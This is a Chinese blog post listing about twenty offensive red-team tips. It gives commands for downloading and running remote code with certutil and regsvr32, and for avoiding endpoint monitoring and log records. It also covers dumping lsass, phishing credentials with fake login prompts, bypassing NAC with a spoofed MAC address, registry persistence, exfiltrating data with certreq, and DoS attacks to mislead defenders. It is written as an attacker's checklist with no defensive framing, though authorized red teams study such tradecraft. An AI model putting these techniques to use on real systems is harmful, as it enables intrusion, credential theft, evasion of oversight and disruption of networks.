红队与渗透测试tips

    摘要

    然后使用打印机的mac地址接入网络;12. 隐藏自己真实目的,可… 20.在使用自动化扫描工具时,你需要限制连接数,避免网络丢包…

    我收集了一些渗透测试tips,同时欢迎大家补充。

    1.使用高知名度的网站(如:Google aws)做C&C 控制服务器,这样可以绕过白名单限制;

    2.使用cleanwipe删除文件,因为它不需要管理员权限;

    (工具见:https://support.symantec.com/en_US/article.HOWTO124983.html  


    3.扫描所有的内网网段(192.168.0.0/16,172.16.0.0/12,10.0.0.0/8),而不是你所在的内网网段,你可能会发现一些被遗忘的网络或主机;


    4.使用 net user /dom 代替 net user /domain,因为net user /domain关键词 有可能被终端安全软件监控着;


    5.使用wmiexec 代替 psexec,因为wmiexec留下更好的日志记录;


    6. Windows下,如果你想上传文件到磁盘,请使用Invoke-ADSBackdoor.ps1https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1 )这个脚本。

    7.如果你有一个windows低权限的shell,你可以使用fake login prompthttps://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1)来钓鱼获取帐号密码;

    8.如果你不想在肉鸡里使用mimikatz获取明文密码,你可以把lsass dump下来,拷贝在本地进行分析;

    9.使用ssh -l username  target -T 登陆ssh,这样可以避免被wtmp记录;


    10. 在退出ssh时候,使用 kill -9 $$  ,这样不会在bash history中留下日志;


    11. 在联网时,如果你发现你被NAC屏蔽了,你可以监听广播收集mac地址,然后使用打印机的mac地址接入网络;

    12. 隐藏自己真实目的,可以用nessusnetsparker等扫描外网,或小量Dos/DDos攻击外网IP,这样迷惑蓝队;

    13.使用ROPEMAKER CVE-2017-0199  进行邮件钓鱼;(ROPEMAKER 开心就好了)

    14.可以使用 certutil.exe 下载文件,使用方法为:certutil -urlcache -split -f <url> <out_filename>


    15.可以使用regsrv32 /s /u dll_name 执行我们的dll


    16.可以使用regsvr32 /s /n /u /i:<url> scrobj.dll  加载执行远程的脚本;


    17.网络钓鱼中,我们可以利用smtp relay 


    18.你可以用目标的主机名作为密码来加密你的payload或者word 宏;

    19.你可以用HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ Debugger 值来保持权限;


    20.在使用自动化扫描工具时,你需要限制连接数,避免网络丢包或者IP被封;

    21.可以使用certreq.exe 进行Windows的数据隐蔽窃取;

    avatar
    • 本文由 发表于 2018年11月19日
    Mac 软件推荐(续)之程序猿篇 mac软件下载

    Mac 软件推荐(续)之程序猿篇

    在前面一篇文章“Mac 软件推荐(续) -- !程序猿篇” (文章取名装X失败, 悲伤)中, 我已经介绍了一些大众化的软件, 当然作为程序猿的你也应该参考参考(没看过前文的必须补上啊).本篇文章将介绍...
    匿名

    发表评论

    匿名网友 填写信息